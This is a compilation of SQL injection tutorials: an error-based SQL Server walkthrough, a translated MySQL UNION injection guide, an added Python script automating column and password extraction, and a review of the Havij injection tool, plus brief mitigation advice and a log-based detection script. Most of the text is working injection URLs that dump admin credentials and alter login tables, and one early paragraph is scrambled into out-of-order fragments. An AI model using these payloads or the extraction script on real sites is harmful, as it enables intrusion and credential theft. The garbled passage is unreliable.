[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching pattern '%25login%25' will be seen as %login% by SQL Server (%25 is the URL encoding of %). In this case, we get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name (the second condition joins with AND; the original article's repeated WHERE is a syntax error):
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

line 5 6. line 5 We now know there is an admin user with the login name of "neo".'password'. i.e. /index.'login_name'. "password".asp. to get the password of "neo" from the database: http://duck/index. /index.2 How to retrieve any data we want? Now that we have identified some important tables. We know this when we get the following error message: http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'-- . "details".asp. Finally.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id'.asp. let's get the first login_name from the "admin_login" table: http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. Now. line 5 When we continue further. we obtained the rest of the column name. /index.Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. we can use the same technique to gather any information we want from the database.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.details')-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. and their column.

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now log in as "neo" with his password "m4trix".

6.3 How to get a numeric string value?
There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with the integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry this way.

To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b, and it must be URL-encoded because a literal + in a query string decodes to a space). We append '(space)morpheus' to the actual password, so even if we have the numeric string '31173', it becomes '31173 morpheus'. By calling the convert() function ourselves, trying to convert '31173 morpheus' into an integer, SQL Server will throw the ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now you can log in as 'trinity' with the password '31173'.
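Sections 6.0 to 6.3 describe one loop: fire a UNION SELECT TOP 1 ..., read the value out of the conversion error, add it to a NOT IN() list, repeat until the error stops naming anything. Here it is as code. This is an added example, not from the walkthrough: fake_index_asp is a constructed stand-in for http://duck/index.asp that answers the same query shapes with the same error strings for the tables, columns and two accounts the walkthrough recovers, and the id=10 statement behind it is assumed. Replace it with a function that GETs the real page with the id parameter URL-encoded (urllib.parse.quote turns + into %2b and the space into %20, as section 6.3 requires) and returns the body.

```python
import re
from urllib.parse import unquote

# Added example, not from the walkthrough: the NOT IN() walk of sections 6.0-6.2
# and the convert()+' morpheus' trick of 6.3, automated. fake_index_asp is a
# constructed stand-in for http://duck/index.asp?id=... that answers the same
# query shapes with the same error strings; the id=10 statement behind it is
# assumed, the tables, columns and two accounts are the ones the walkthrough finds.

ODBC_ERR = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
            "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
            "the nvarchar value '{}' to a column of data type int.\n/index.asp, line 5")
NO_ROW = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
          "[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear "
          "in the select list if the statement contains a UNION operator.\n/index.asp, line 5")
FAKE_DB = {"table1": ["id", "name"],  # constructed schema
           "admin_login": ["login_id", "login_name", "password", "details"]}
FAKE_ROWS = {"admin_login": [{"login_name": "neo", "password": "m4trix"},
                             {"login_name": "trinity", "password": "31173"}]}


def fake_index_asp(id_param: str) -> str:
    q = unquote(id_param)
    m = re.match(r"10 UNION SELECT TOP 1 (.+?) FROM (\S+)(?: WHERE (.+?))?--$", q, re.I)
    if not m:
        return "<html>normal page for id=10</html>"
    expr, source, where = m.group(1), m.group(2).upper(), m.group(3) or ""
    ni = re.search(r"NOT IN \((.*?)\)", where, re.I)
    excluded = set(re.findall(r"'([^']*)'", ni.group(1))) if ni else set()
    if source == "INFORMATION_SCHEMA.TABLES":
        value = next((t for t in FAKE_DB if t not in excluded), None)
    elif source == "INFORMATION_SCHEMA.COLUMNS":
        tbl = re.search(r"TABLE_NAME='(\w+)'", where, re.I).group(1)
        value = next((c for c in FAKE_DB[tbl] if c not in excluded), None)
    else:  # TOP 1 <col>[+'suffix'] FROM <data table> WHERE login_name='x'
        who = re.search(r"login_name='(\w+)'", where, re.I)
        row = next(r for r in FAKE_ROWS[source.lower()] if not who or r["login_name"] == who.group(1))
        col = re.search(r"(\w+)", expr.replace("convert(int,", "")).group(1)
        suffix = re.search(r"\+'([^']*)'", expr)
        value = row[col] + (suffix.group(1) if suffix else "")
    if value is None:
        return NO_ROW
    if value.isdigit():  # a digit string converts to int cleanly: no error, the page just renders
        return "<html>normal page</html>"
    return ODBC_ERR.format(value)


LEAK = re.compile(r"converting the nvarchar value '(.*)' to a column of data type int")


def leak(page: str):
    """The value SQL Server could not convert, or None if the page carried no such error."""
    m = LEAK.search(page)
    return m.group(1) if m else None


def walk(fetch, source: str, key: str = "TABLE_NAME", where: str = "") -> list:
    """Grow a NOT IN() list until the conversion error stops naming a new value."""
    found = []
    while True:
        conds = [where] if where else []
        if found:
            conds.append(f"{key} NOT IN ({','.join(repr(f) for f in found)})")
        tail = f" WHERE {' AND '.join(conds)}" if conds else ""
        value = leak(fetch(f"10 UNION SELECT TOP 1 {key} FROM {source}{tail}--"))
        if value is None:
            return found
        found.append(value)


def fetch_text(fetch, table: str, col: str, who: str):
    """Plain TOP 1 first; if the value was all digits no error fires, so force it via convert()."""
    plain = leak(fetch(f"10 UNION SELECT TOP 1 {col} FROM {table} WHERE login_name='{who}'--"))
    if plain is not None:
        return plain
    forced = leak(fetch(f"10 UNION SELECT TOP 1 convert(int,{col}+' morpheus') FROM {table} WHERE login_name='{who}'--"))
    return forced[: -len(" morpheus")] if forced and forced.endswith(" morpheus") else forced


if __name__ == "__main__":
    tables = walk(fake_index_asp, "INFORMATION_SCHEMA.TABLES")
    cols = walk(fake_index_asp, "INFORMATION_SCHEMA.COLUMNS", "COLUMN_NAME", "TABLE_NAME='admin_login'")
    print(tables, cols, fetch_text(fake_index_asp, "admin_login", "password", "trinity"))
```

fetch_text is the 6.3 logic in one place: the plain query comes back as a normal page for '31173', so the second query glues ' morpheus' on and strips it off again. Against a real target the stopping condition in walk is the same as in the article: any response without a conversion error, whether the ORDER BY complaint shown above or a plain page.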

7.0 How to update/insert data into the database?
When we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record into the table. For example, to change the password of "neo":
http://duck/index.asp?id=10; UPDATE admin_login SET password = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--
We can now log in as "neo2" with the password "newpas5". (The original article wrapped the table and column names in single quotes; in T-SQL that makes them string literals, so they are written as plain identifiers here.)

8.0 How to avoid SQL Injection?
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies
For numeric values, convert the value to an integer before putting it into the SQL statement, or use ISNUMERIC to make sure it is an integer. Better than filtering: pass values as parameters of a parameterized query, so that nothing the user supplies is ever parsed as SQL.

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Delete stored procedures that you are not using, like:
master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered is the paper from Rain Forest Puppy about how he hacked PacketStorm:
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL servers:
http://www.owasp.org/asac/input_validation/sql.shtml

Sensepost's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm

Other worthwhile readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Simple SQL Injection on MySQL v5
http://andr381.wordpress.com/2008/11/21/cara-sederhana-sql-injection-mysql-v5/

Simple SQL Injection on MySQL v5 | author: Andr3^81, email: andr3-81 [at] linuxmail [dot] org

http://site.com/vuln.php?id=1' <- error

Let's try to find the database name:
http://site.com/vuln.php?id=1 union all select 0 from admin
We get the database name: bego
http://site.com/vuln.php?id=1 union all select 0 from information_schema.tables
Not successful yet.

Let's find the number of columns:
http://site.com/vuln.php?id=1 order by 9/* no error
http://site.com/vuln.php?id=1 order by 10/* error
So we conclude there are 9 columns.
http://site.com/vuln.php?id=1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*
Nothing shows up; add a (-) right after the (=):
http://site.com/vuln.php?id=-1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*
The number 3 shows up.

To find the table name, we replace the 3 with table_name:
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema='bego'/*
We get the table name tblArsip. To find the other table names we use limit 1,1:
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema='bego' limit 1,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema='bego' limit 2,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema='bego' limit 3,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema='bego' limit 4,1/*
until nothing more shows up on the screen. Suppose we find the table name tblUser.

Now we are going to find the column names. To find the column names, we replace the 3 with column_name:
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name='tblUser'/*
We get the column name UserName. To find the other column names we use limit 1,1:
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name='tblUser' limit 1,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name='tblUser' limit 2,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name='tblUser' limit 3,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name='tblUser' limit 4,1/*
We get the column names UserName, UserLogin, UserPass, UserMail.

Once we have the table and column names we put them in:
http://site.com/vuln.php?id=-1 union all select 1,2,UserLogin,4,5,6,7,8,9 from tblUser
http://site.com/vuln.php?id=-1 union all select 1,2,UserPass,4,5,6,7,8,9 from tblUser
We get the login: admin
We get the password: 1234
All that's left is to find the admin page. Say we find http://site.com/admin.php; then just enter login: admin, password: 1234.
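Turning the two walkthroughs above (the SQL Server paper and the MySQL v5 tutorial) into detection: an added example, not from either tutorial, that scans web server access log lines for the query-string patterns they rely on (the order by probes, union ... select, information_schema enumeration, convert(), the initial ' probe, and the -- and /* terminators). The log lines are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines echoing the requests in the two tutorials.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Nov/2008:10:00:01 +0700] "GET /vuln.php?id=1' HTTP/1.1" 500 312
203.0.113.5 - - [21/Nov/2008:10:00:09 +0700] "GET /vuln.php?id=1%20order%20by%209/* HTTP/1.1" 200 4123
203.0.113.5 - - [21/Nov/2008:10:00:12 +0700] "GET /vuln.php?id=1%20order%20by%2010/* HTTP/1.1" 500 301
203.0.113.5 - - [21/Nov/2008:10:00:40 +0700] "GET /vuln.php?id=-1%20union%20all%20select%201,2,table_name,4,5,6,7,8,9%20from%20information_schema.tables/* HTTP/1.1" 200 4200
198.51.100.7 - - [21/Nov/2008:10:01:00 +0700] "GET /index.asp?id=10%20UNION%20SELECT%20TOP%201%20convert(int,password%2b'%20morpheus')%20FROM%20admin_login-- HTTP/1.1" 500 512
192.0.2.9 - - [21/Nov/2008:10:02:00 +0700] "GET /vuln.php?id=7 HTTP/1.1" 200 4100
"""

# client ip, then the request path (everything between the method and HTTP/x.y)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Each indicator runs against the URL-decoded, lower-cased query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),   # union injection
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),               # column counting
    "schema_enum": re.compile(r"\binformation_schema\."),              # table/column listing
    "type_conversion": re.compile(r"\bconvert\s*\("),                  # error-based leak
    "comment_terminator": re.compile(r"(?:--|/\*)\s*$"),               # rest of query cut off
    "quote_in_numeric": re.compile(r"\bid=\d*'"),                      # the initial ' probe
}

def scan(log_text):
    """Return {client_ip: set of indicator names} for clients whose queries matched."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        ip, path = m.groups()
        query = unquote_plus(path.split("?", 1)[1]).lower()
        for name, rx in INDICATORS.items():
            if rx.search(query):
                hits[ip].add(name)
    return dict(hits)

def flagged(log_text, min_indicators=2):
    """Clients that showed at least min_indicators distinct patterns: worth an alert."""
    return sorted(ip for ip, names in scan(log_text).items() if len(names) >= min_indicators)
```

A single indicator can be a false positive (a legitimate page may carry order by in its parameters), which is why flagged() alerts only on clients that combine several of them.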

Havij: An Advanced SQL Injection Tool!
May 29, 2010 23:23 pm by Black in Penetration Testing, Web Application Penetration Testing, Windows
http://pentestit.com/2010/05/29/havij-advanced-sql-injection-tool/

We are really liking this tool. For with this tool, you can almost go back to your "point and shoot" days! Havij is a free tool, programmed in Visual Basic, that will automate SQL injections for you! In fact, just to test it out, we tried this on an installation of DVWA and it got us what we wanted! Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. All you need to know is a bit of SQL injection and you are done. You just need to click a button and wait till it finds an exploitable SQL query. Not only that, it supports a wide array of databases – MsSQL, MySQL, MSAccess and Oracle! You could also choose to evade IDS detection by the simple pre-configured tricks of this tool. Not only that, you can also fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system. Of course, most of that is after you have a successful exploit. You can also try to brute force your way to find the admin directory and yes, it does support proxies too! This is how Havij looks:

These are the current functions that Havij supports as of now:
• Supported databases with injection methods:
  a. MsSQL 2000/2005 with error
  b. MsSQL 2000/2005 no error (union based)
  c. MySQL (union based)
  d. MySQL Blind
  e. MySQL error based
  f. Oracle (union based)
  g. MsAccess (union based)
• Automatic database detection
• Automatic type detection (string or integer)
• Automatic keyword detection (finding the difference between the positive and negative response)
• Trying different injection syntaxes
• Proxy support
• Real time result
• Options for replacing space by /**/, +, … against IDS or filters
• Avoid using strings (magic_quotes and similar filters bypass)
• Bypassing illegal union
• Fully customizable HTTP headers (like referer and user agent)
• Load cookie from site for authentication
• Guessing tables and columns in mysql<5 (also in blind) and MsAccess
• Fast getting tables and columns for mysql
• Multi thread
• Admin page finder

• Online MD5 cracker
• Getting DBMS information
• Getting tables, columns and data
• Command execution (mssql only)
• Reading system files (mysql only)
• Insert/update/delete data

As we have already said, since this is a tool written in Visual Basic, it will run only on Windows. Installation is pretty simple too. We noticed something peculiar about this tool: it installs columns.txt, admins.txt and tables.txt. Call them the databases of Havij. You are free to add your stuff to these files. Just take care where you add those things.
